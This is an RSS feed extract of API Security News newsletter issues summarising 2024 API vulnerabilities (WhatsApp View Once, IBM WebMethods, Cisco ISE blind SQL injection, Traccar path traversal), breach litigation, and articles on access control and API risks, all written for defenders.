<p style="font-weight: 400;"><span style="font-weight: 400;">The </span><a href="https://www.imperva.com/blog/rising-cost-of-vulnerable-apis-and-bot-attacks-a-186b-wake-up-call/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> published by Imperva estimates the average annual cost of API-related incidents worldwide is between $35 billion and $87 billion. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">These losses associated with API incidents somewhat offset the benefits of API adoption, such as reduced operational costs and increased revenue. And as organizations expand their adoption of APIs, the cost and risks of API incidents also increase.</span></p>
<p style="font-weight: 400; padding-left: 40px;"><i><span style="font-weight: 400;">“On average, organizations have 613 API endpoints, </span></i><i><span style="font-weight: 400;">providing many potential entry points for attackers.”</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Some of the top API vulnerabilities identified in the report include BOLA, broken authentication, undocumented APIs, and automated bot attacks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Organizations are advised to invest in comprehensive API security strategies to address these API vulnerabilities and their associated costs. </span></p>
<h2><span style="font-weight: 400;">Article: How small mistakes create big API risks</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In this </span><a href="https://thenewstack.io/3-api-vulnerabilities-developers-accidentally-create/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;">, Katie Paxton-Fear describes three different API security incidents she has encountered in her role as an ethical hacker.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One of the incidents involves broken authentication that could have led to a plane crash. Katie describes how her role often involves learning about the logic of an API and the functionality it&#8217;s supposed to provide in order to uncover vulnerabilities. Understanding how a relatively simple development mistake can lead to potentially serious real-world consequences is part of the role of an experienced ethical API hacker.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">An important takeaway from the article is the importance of involving developers in finding and fixing API security issues, despite an already heavy workload. I completely agree that for teams to be successful in securing APIs, developers need to be invested and enthusiastic about the security of their API code, and organizations need to foster a culture of security.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">I also recommend watching the full video presentation for more detail on API vulnerabilities.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">By the way, I think the images in the article of vulnerable and not-vulnerable code may be  accidentally reversed. </span></p>
<h2><span style="font-weight: 400;">Report: API security a top priority for digital businesses in Asia</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A </span><a href="https://www.akamai.com/resources/research-paper/asia-digital-native-businesses-report" target="_blank" rel="noopener"><span style="font-weight: 400;">survey</span></a><span style="font-weight: 400;"> of over 200 technology leaders at digital native businesses (DNB) across Asia highlights the top security concerns in 2024. API security tops the list of cybersecurity investment priorities, surpassing web application and anti-phishing security.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The report links the need for DNBs to deliver more services to customers, faster and at scale, to the growing adoption of APIs to create a system that can meet these needs. This increased reliance on APIs is driving technology leader’s urgency to improve their API security posture.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The survey highlights why the need for API security is more acute for DNBs that are heavily invested in cloud-based technologies. APIs are widely used to support interconnected microservices running in the cloud, and also to support integration of cloud and on-premise systems and applications. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The report concludes that API security must be integrated into every step of the development process to protect against the various threats and methods used by hackers, including: </span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">API path parameter fuzzing</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">malicious JSON payloads</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">unauthorized API access</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">Secure API design, rigorous API testing, and a robust governance process for API lifecycle management are some of the essential and recommended steps to help mitigate the risk of API vulnerabilities.</span></p>
<p>The post <a href="https://apisecurity.io/issue-255-versa-director-api-flaw-feeld-bola-vulnerabilities-logic-flaw-risks-aircraft-disaster/">Issue 255: Versa Director API flaw, Feeld BOLA vulnerabilities, logic flaw risks aircraft disaster</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 254: WhatsApp and IBM WebMethods vulnerabilities, 3rd-party API and LLM risks, API access controls</title>
		<link>https://apisecurity.io/issue-254-whatsapp-and-ibm-webmethods-vulnerabilities-3rd-party-api-and-llm-risks-api-access-controls/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 12 Sep 2024 14:05:21 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[api security]]></category>
		<category><![CDATA[GenAI]]></category>
		<category><![CDATA[LLM integration]]></category>
		<category><![CDATA[Unsafe API Consumption]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11213</guid>

					<description><![CDATA[<p>This week, we investigate a recent flaw in WhatsApp’s View Once privacy feature and also critical vulnerabilities reported in the IBM WebMethods integration platform. We highlight a NordicAPIs article on the risks from third-party API and LLMs, and an article on solving the challenges of fine-grained access control for APIs. There’s also an interesting webinar [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-254-whatsapp-and-ibm-webmethods-vulnerabilities-3rd-party-api-and-llm-risks-api-access-controls/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-254-whatsapp-and-ibm-webmethods-vulnerabilities-3rd-party-api-and-llm-risks-api-access-controls/">Issue 254: WhatsApp and IBM WebMethods vulnerabilities, 3rd-party API and LLM risks, API access controls</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we investigate a recent flaw in WhatsApp’s View Once privacy feature and also critical vulnerabilities reported in the IBM WebMethods integration platform. We highlight a NordicAPIs article on the risks from third-party API and LLMs, and an article on solving the challenges of fine-grained access control for APIs. There’s also an interesting webinar examining how GenAI can increase the attack surface for risky APIs.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: WhatsApp client-side security flaw</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A research team at Zengo </span><a href="https://zengo.com/whatsapps-view-once-privacy-issue/" target="_blank" rel="noopener"><span style="font-weight: 400;">has discovered a flaw</span></a><span style="font-weight: 400;"> in WhatsApp’s View Once privacy feature. This feature allows a WhatsApp user to send photos, voice messages, or videos that disappear from a chat after the recipient downloads and opens them once. The feature also prevents a recipient from saving, sharing or even screen-capturing a photo or video on their device. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The discovered vulnerability is an example of inappropriately offloading privacy or authorization checks to the client-side that should actually be performed at the API server.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Basically, the way WhatsApp has implemented this privacy feature involves the recipient&#8217;s WhatsApp client sending a request to the WhatsApp API server to download a photo, for example. The client includes a property in the request called “viewOnce” which will be set to true if the original sender has enabled the View Once privacy restriction. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The problem is that it is easy for the recipient to change the viewOnce property from true to false if they know how to bypass the client and call the WhatsApp API server directly. In this case the photo is downloaded without its View Once restrictions, overriding the privacy set by the sender and original owner of the photo.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is a fairly common mistake made by developers who offload authorization or privacy checks to the client. We previously reported on similar incidents, such as a </span><a href="https://apisecurity.io/issue-252-api-security-in-apac-crowdstrike-and-canary-tests-api-vulnerabilities-in-solar-platforms-and-react-apps-costs-of-a-data-breach/#:~:text=Vulnerability%3A%20Siemens%20React%20app%20missing%20API%20authorization" target="_blank" rel="noopener"><span style="font-weight: 400;">vulnerability found in an app by Siemens</span></a><span style="font-weight: 400;">.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For more technical details, I recommend the Zengo team&#8217;s </span><a href="https://medium.com/@TalBeerySec/once-and-forever-whatsapps-view-once-functionality-is-broken-302a508390b0" target="_blank" rel="noopener"><span style="font-weight: 400;">in-depth report</span></a><span style="font-weight: 400;">, which includes a video demonstration of the exploit.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The key is to always apply authorization or privacy checks at the API, not at the client level.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Critical bugs in IBM’s WebMethods platform</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">This month, IBM released a </span><a href="https://www.ibm.com/support/pages/node/7167245" target="_blank" rel="noopener"><span style="font-weight: 400;">security bulletin</span></a><span style="font-weight: 400;"> describing critical and high vulnerabilities discovered in its WebMethods Integration platform. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">According to a </span><a href="https://newsroom.ibm.com/2024-07-01-IBM-Completes-Acquisition-of-StreamSets-and-webMethods,-Bolstering-its-Automation,-Data-and-AI-Portfolios" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> by PRNewswire, IBM acquired WebMethods from Software AG earlier this year. WebMethods is widely used for service integration and API management. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The reported vulnerabilities allow a malicious user to upload and execute arbitrary files on the platform, or grant escalated privileges to a malicious platform account. WebMethods is also vulnerable to path or directory traversal attacks, where a malicious user injects path traversal patterns into the input (“../..”) to trick the platform into sharing access to unauthorized parts of the file system. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Security vulnerabilities in a trusted API management platform can be exploited by hackers to gain unauthorized access into other parts of the API infrastructure.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">IBM strongly recommends that affected users apply the provided patch to fix these issues. </span></p>
<h2><span style="font-weight: 400;">Article: Unsafe API consumption and LLM integrations </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Many tech companies are excited about enhancing their products by integrating AI solutions. According to one </span><a href="https://nordicapis.com/tips-for-boosting-product-features-with-generative-ai/" target="_blank" rel="noopener"><span style="font-weight: 400;">analyst</span></a><span style="font-weight: 400;">, in the near future “at least 70% of any software product you touch is going to have an AI component to itself”.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For teams considering deploying and managing a large language model (LLM), OWASP has launched a new Top 10 project to raise awareness of LLM-specific security risks. This is a timely reminder to consider the potential security implications of using LLMs.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">AI platforms provide their own sets of APIs to allow developers to integrate AI services into their own products. These AI platforms also consume other third-party APIs, creating a complex supply chain of API producers and consumers. This can expose teams to vulnerabilities from unsafe API consumption.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent </span><a href="https://nordicapis.com/6-potential-risks-of-using-third-party-apis/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> by Art Anthony of NordicAPIs highlights the security risks of integrating with third-party APIs, including security issues caused by over-reliance on LLMs.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For teams with projects underway to integrate and leverage an LLM or other third-party platforms, this article provides important food for thought.</span></p>
<h2><span style="font-weight: 400;">Article: How to implement fine-grained API access control </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Four of the top five OWASP API security vulnerabilities involve access control; specifically authentication or authorization. This indicates a broad consensus that access control vulnerabilities represent the most critical risk to APIs. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For example, Imperva </span><a href="https://www.imperva.com/resources/resource-library/reports/2024-bad-bot-report/" target="_blank" rel="noopener"><span style="font-weight: 400;">reported</span></a><span style="font-weight: 400;"> that 44% of all recorded account takeover attacks in 2023 specifically targeted APIs, so hackers are certainly focusing on APIs as vulnerable access control points. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In addition to managing this security risk, API development teams must also implement increasingly complex access control policies. Product managers are tasked with delivering services and features at a fine-grained level, often based on customer requests or sales strategies. The challenge for API teams, then, is how to deliver more complexity with less vulnerability.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In </span><a href="https://curity.io/blog/strengthen-api-access-control-with-attribute-based-authorization/" target="_blank" rel="noopener"><span style="font-weight: 400;">this article</span></a><span style="font-weight: 400;">, Michal Trojanowski from Curity describes the concept of Attribute-Based Access Control (ABAC) for APIs. His proposed solution combines the security of a well-implemented Oauth-based authorization flow with the fine granularity of claims-based policies, which can meet the needs of enterprises to provide more access options to product services and features in a secure manner.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Given the importance of access control vulnerabilities to API security in general, this article is definitely worth reading.</span></p>
<h2><span style="font-weight: 400;">Article: Promoting secure practices for API developers</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent </span><a href="https://cybersecuritynews.com/developers-vulnerabilities-organization/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> from Cyber Security News explains why developers play such an important role in an organization&#8217;s cyber defenses and outlines practices a team can adopt to help prevent common vulnerabilities. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Secure coding practices and regular security testing can go a long way in preventing API vulnerabilities from leaking into production environments and being exploited by hackers. It’s worth noting that many of the API incidents we report in this newsletter are often a direct result of mistakes and oversights during the API development process. Secure development practices, implemented consistently, can remove entire classes of vulnerabilities from the API code. API developers and testers have a responsibility in this regard, and awareness is essential.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Aside from secure coding and testing, the article also encourages developers to take on leadership roles by staying informed about emerging threats and to be active in promoting security awareness within the team. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">With this goal in mind, consider sharing APISecurity.io with your API development and testing teams as a resource to stay informed about emerging threats and vulnerabilities in the API security space.</span></p>
<h2><span style="font-weight: 400;">Webinar: When GenAI Meets Risky APIs</span></h2>
<p><a href="https://42crunch.com/when-gen-ai-meets-risky-apis/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-11214" src="https://apisecurity.io/wp-content/uploads/2024/09/When-GenAI-meets-Risky-APIs-Social-300x172.png" alt="" width="600" height="344" srcset="https://apisecurity.io/wp-content/uploads/2024/09/When-GenAI-meets-Risky-APIs-Social-300x172.png 300w, https://apisecurity.io/wp-content/uploads/2024/09/When-GenAI-meets-Risky-APIs-Social.png 752w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">As Generative AI adoption grows across the enterprise, so does the risk surface for potential data breaches and attacks. API security is a must have if you want to enable the responsible and effective deployment of GenAI technology.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Join my colleagues</span><span style="font-weight: 400;"> from 42Crunch as they demonstrate <a href="https://42crunch.com/when-gen-ai-meets-risky-apis/" target="_blank" rel="noopener">how GenAI can be used to exploit unsecured APIs</a> to gain unauthorized access, inject malicious prompts and manipulate data. Also, learn how to prevent your APIs from being undermined by adopting a proactive API security as code approach to defending your APIs.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;"><a href="https://42crunch.com/when-gen-ai-meets-risky-apis/" target="_blank" rel="noopener">Register here</a></span></p>
<p>The post <a href="https://apisecurity.io/issue-254-whatsapp-and-ibm-webmethods-vulnerabilities-3rd-party-api-and-llm-risks-api-access-controls/">Issue 254: WhatsApp and IBM WebMethods vulnerabilities, 3rd-party API and LLM risks, API access controls</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 253: Breached companies face litigation, SQL injection in Cisco APIs, API Security for Automotive &#038; Finance</title>
		<link>https://apisecurity.io/issue-253-breached-companies-face-litigation-sql-injection-in-cisco-apis-api-security-for-automotive-finance/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 29 Aug 2024 20:51:34 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11205</guid>

					<description><![CDATA[<p>This week, we look at the growing number of penalties that companies can now face in the event of a data breach. We also learn about critical API vulnerabilities discovered in Cisco and Traccar products. VicOne recently published a white paper on automotive API security, and we also want to highlight a LinkedIn post on [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-253-breached-companies-face-litigation-sql-injection-in-cisco-apis-api-security-for-automotive-finance/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-253-breached-companies-face-litigation-sql-injection-in-cisco-apis-api-security-for-automotive-finance/">Issue 253: Breached companies face litigation, SQL injection in Cisco APIs, API Security for Automotive &#038; Finance</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we look at the growing number of penalties that companies can now face in the event of a data breach. We also learn about critical API vulnerabilities discovered in Cisco and Traccar products. VicOne recently published a white paper on automotive API security, and we also want to highlight a LinkedIn post on the crucial role of APIs in the financial sector.</span></p>
<h2><span style="font-weight: 400;">Article: Costly Breaches at National Public Data and T-Mobile </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">National Public Data (NPD) in the US has been in the news recently due to a massive data breach. A </span><a href="https://www.biometricupdate.com/202408/investigations-into-massive-national-public-data-breach-heat-up" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> by BiometricUpdate.com indicates a breach that includes 272 million Social Security numbers. While the cause of the breach remains unclear, a</span><a href="https://krebsonsecurity.com/2024/08/national-public-data-published-its-own-passwords/" target="_blank" rel="noopener"><span style="font-weight: 400;"> recent update</span></a><span style="font-weight: 400;"> from KrebsOnSecurity suggests that a sister site to NPD may have accidentally published its own site passwords in a publicly accessible file.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The company is now facing multiple class action lawsuits claiming that NPD: “failed to properly secure and safeguard the PII that it collected and maintained as part of [its] regular business practices.”</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In addition to the allegation of failing to protect customers’ PII, the company has also been criticized for its lack of transparency and failure to notify victims of the risk in a timely manner. This is another potential pitfall for companies, as different industries, from finance to healthcare, have different reporting requirements, and some are more stringent than others. For example, under the HIPAA Breach Notification Rule, organizations that handle U.S. citizens’ health data must notify affected individuals within 60 days. Companies that delay notifying their customers can face additional penalties.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Meanwhile, T-Mobile is facing its own data breach issues. According to a </span><a href="https://thecyberexpress.com/t-mobile-national-security-agreement-breaches/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> in The Cyber Express, the Committee on Foreign Investment in the United States (CFIUS) recently fined T-Mobile $60 million for “not taking adequate measures to prevent unauthorized access to sensitive data and reporting incidents in a timely manner”.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">So, once again, a company is being penalized both for its lack of adequate cybersecurity and for failing to report the incidents to regulators and the victims of the breach. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Both cases should encourage companies to review existing cybersecurity controls to protect customer data, as well as the tools and processes in place to report incidents to the right people in a timely manner.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Blind SQL Injection discovered in Cisco APIs</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A Cisco </span><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rest-5bPKrNtZ" target="_blank" rel="noopener"><span style="font-weight: 400;">security advisory</span></a><span style="font-weight: 400;"> highlights multiple API vulnerabilities discovered in Cisco’s Identity Services Engine (ISE) product, exposing the tool to blind SQL injection attacks. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In a traditional SQL injection attack, the API is tricked into leaking unauthorized data directly from the SQL database. But in a </span><a href="https://owasp.org/www-community/attacks/Blind_SQL_Injection" target="_blank" rel="noopener"><i><span style="font-weight: 400;">blind</span></i><span style="font-weight: 400;"> SQL injection</span></a><span style="font-weight: 400;"> attack, the API doesn’t leak data directly. Instead the attacker sends carefully crafted true or false questions to the database to brute-force the data leak. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This means that it takes a bit more work for an attacker to pull off a blind injection attack. Rate-limiting the API can also help mitigate the risk by limiting the number of true or false questions an attacker can submit.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">However, for both types of SQL injection the vulnerability often occurs due to insufficient validation of user-supplied input. It is the responsibility of API developers to adopt secure development practices and validate user input to ensure that only expected API data is accepted.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The vulnerable Cisco ISE product is described as “the industry-leading tool for ultimate visibility into every device on your network”. Critically, API attacks against this kind of network management device can expose other parts of the system to attacks. Similarly, SQL injection vulnerabilities have also been discovered in the F5 Big IP Next device.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">You can read more technical details about the issues and solutions in our in-depth analysis in this article: </span><a href="https://42crunch.com/the-scourge-of-sql-injection-for-apis/" target="_blank" rel="noopener"><span style="font-weight: 400;">The Scourge of SQL Injection for APIs</span></a><span style="font-weight: 400;">. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: API flaw exposes Traccar GPS system to remote attacks</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">According to a </span><a href="https://cybersecuritynews.com/traccar-gps-system-vulnerability/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> by Cyber ​​Security News, a critical API vulnerability has been discovered in the open-source GPS tracking system Traccar. A new API endpoint allowed users to upload image files to the Traccar system. However, user input was not properly validated or sanitized, exposing the API to path traversal attacks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The </span><a href="https://github.com/traccar/traccar/security/advisories/GHSA-3gxq-f2qj-c8v9" target="_blank" rel="noopener"><span style="font-weight: 400;">vulnerability report</span></a><span style="font-weight: 400;"> outlines the potential impact of an exploit:</span></p>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“Attackers have full control over the file contents, full control over the directory where the file is stored, full control over the file extension, and partial control over the file name”.</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A </span><a href="https://hackernoon.com/a-deep-dive-into-path-traversal-vulnerabilities" target="_blank" rel="noopener"><span style="font-weight: 400;">path traversal attack</span></a><span style="font-weight: 400;"> typically tricks a vulnerable API into uploading or downloading a file from an unexpected location on the API server file system. The attack works by injecting special patterns into the API input, such as “../”. This causes a vulnerable API to switch to a parent directory on the server, giving the malicious user control over where the API accesses files from. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A path traversal vulnerability occurs when an API does not properly validate user input and allows malicious patterns. In the case of Traccar, the vulnerability could be exploited through two parameters in the APIs request: a device uniqueId property and a content-type header.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Reliance on open source software (OSS) carries the risk of security vulnerabilities. The Traccar team is certainly to be commended for devoting time and effort to developing and sharing its source code. However, any individual or company that chooses to leverage OSS to provide services to their customers should take extra precautions to verify, and if necessary implement, adequate security.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Too often, OSS risk is measured by CVEs found in the code. This is helpful but does not cover the full range of API vulnerabilities that may be latent in the code. Development teams relying on OSS should be required to perform a thorough review and audit of the APIs defined and implemented by OSS, to locate and remove vulnerabilities.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Something to watch out for in your own API development. </span></p>
<h2><span style="font-weight: 400;">Article: Safely integrating APIs in the automotive ecosystem</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Nowadays all kinds of technologies and services are integrated using APIs to provide exciting new features and capabilities. The security of these systems depends heavily on the integrity of the data transmitted between trusted API connections. A single weak point can expose the entire system to a breach.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One of the most recent API vulnerabilities introduced in the OWASP 2023 API Top 10 list is “Unsafe Consumption of APIs”. From the OWASP </span><a href="https://owasp.org/API-Security/editions/2023/en/0x04-release-notes/" target="_blank" rel="noopener"><span style="font-weight: 400;">release notes</span></a><span style="font-weight: 400;">:</span></p>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">We added &#8220;Unsafe Consumption of APIs&#8221; to address something we&#8217;ve started seeing: attackers have started looking for a target&#8217;s integrated services to compromise those, instead of hitting the APIs of their target directly. This is the right time to start creating awareness about this increasing risk.</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This risk from integrated services is widespread in the automotive industry. A recent </span><a href="https://vicone.com/blog/is-the-automotive-industry-prepared-to-navigate-api-security-risks-in-software-defined-vehicles" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> by Ling Cheng of Trend Micro subsidiary VicOne describes the complexity of API connections powering modern vehicles, including between embedded subsystems, mobile apps and SaaS applications from the auto manufacturer and various component suppliers. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Each of these API connections represents a potential weak point that an attacker can exploit to compromise any other part of the system. Ling’s article shares recommendations for managing API security risks in such an expansive automotive ecosystem. VicOne has also published a </span><a href="https://www.reuters.com/markets/deals/cybersecurity-firm-trend-micro-explores-sale-sources-say-2024-08-08/" target="_blank" rel="noopener"><span style="font-weight: 400;">white paper</span></a><span style="font-weight: 400;"> on the topic that includes real world examples.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Definitely worth a read.</span></p>
<h2><span style="font-weight: 400;">Article: How APIs facilitate financial regulatory compliance</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The term “financial grade security” is synonymous with the highest standards in API security. It is also used outside of the financial sector, and in fact the working group formerly known as </span><a href="https://openid.net/wg/fapi/#:~:text=What%20is%20FAPI%20Working%20Group%3F" target="_blank" rel="noopener"><span style="font-weight: 400;">“Financial Grade API”</span></a><span style="font-weight: 400;"> was renamed FAPI to reflect the fact that API security frameworks from the financial sector can be positively applied in other industries.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One reason why financial security is considered a gold standard is that financial institutions must comply with strict regulations regarding cybersecurity, consumer data protection, and data access. APIs play a vital role in this compliance.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The Financial Data Access (FiDA) framework mandates the sharing of customer data between institutions, and APIs provide the standard interfaces to facilitate this data sharing. This brings APIs within the scope of other financial regulatory frameworks such as Digital Operational Resilience Act (DORA) which mandates resilience to cyberattacks. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">If you’re interested in learning more about the role of APIs in the financial sector, I recommend </span><a href="https://www.linkedin.com/pulse/role-apis-dora-fida-david-rold%C3%A1n-mart%C3%ADnez-0kisf" target="_blank" rel="noopener"><span style="font-weight: 400;">this recent article</span></a><span style="font-weight: 400;"> by David Roldán Martínez on LinkedIn. In it, he calls APIs the “backbone of compliance” and describes in detail how APIs help organizations meet the stringent security and integration requirements of FiDA and DORA.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Great insights from David on the topic of financial APIs. </span></p>
<p>The post <a href="https://apisecurity.io/issue-253-breached-companies-face-litigation-sql-injection-in-cisco-apis-api-security-for-automotive-finance/">Issue 253: Breached companies face litigation, SQL injection in Cisco APIs, API Security for Automotive &#038; Finance</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 252: API Security in APAC, Crowdstrike and canary tests, API vulnerabilities in solar platforms and React apps, Costs of a data breach</title>
		<link>https://apisecurity.io/issue-252-api-security-in-apac-crowdstrike-and-canary-tests-api-vulnerabilities-in-solar-platforms-and-react-apps-costs-of-a-data-breach/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 15 Aug 2024 14:25:59 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11188</guid>

					<description><![CDATA[<p>This week, we look at a survey of API security priorities in Asia Pacific and why canary testing became a hot topic following the Crowdstrike incident. We examine two cases of API vulnerabilities discovered in the field, and finally, we review the potential cost and implications of a data breach. Survey: API security insights from [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-252-api-security-in-apac-crowdstrike-and-canary-tests-api-vulnerabilities-in-solar-platforms-and-react-apps-costs-of-a-data-breach/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-252-api-security-in-apac-crowdstrike-and-canary-tests-api-vulnerabilities-in-solar-platforms-and-react-apps-costs-of-a-data-breach/">Issue 252: API Security in APAC, Crowdstrike and canary tests, API vulnerabilities in solar platforms and React apps, Costs of a data breach</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we look at a survey of API security priorities in Asia Pacific and why canary testing became a hot topic following the Crowdstrike incident. We examine two cases of API vulnerabilities discovered in the field, and finally, we review the potential cost and implications of a data breach.</span></p>
<h2><span style="font-weight: 400;">Survey: API security insights from APAC</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A </span><a href="https://www.f5.com/c/apcj-2024/asset/2024-strategic-insights-api-security-in-apac" target="_blank" rel="noopener"><span style="font-weight: 400;">survey</span></a><span style="font-weight: 400;"> of 297 professionals across various industries in Asia-Pacific highlights the top concerns around API Security. Here are some of the insights that caught our attention in this report.</span></p>
<p style="font-weight: 400;"><em><span style="font-weight: 400;"><span style="font-weight: 400;"><span style="font-weight: 400;"><br />
Internal APIs are the most commonly used APIs by organizations in the Asia Pacific region, but the biggest concern when it comes to API access control is the risk posed from external users.</span></span></span></em></p>
<p>This may indicate that API security is still viewed through a traditional lens of “perimeter security”, where a WAF or Gateway appliance deployed at the ingress/egress point centrally controls external user access to on-premise applications.</p>
<p>However, internal APIs present new security challenges. Without authorization and access control policies between internal APIs, a single breach at a benign entry point can quickly escalate into lateral attacks on more critical back-end systems.</p>
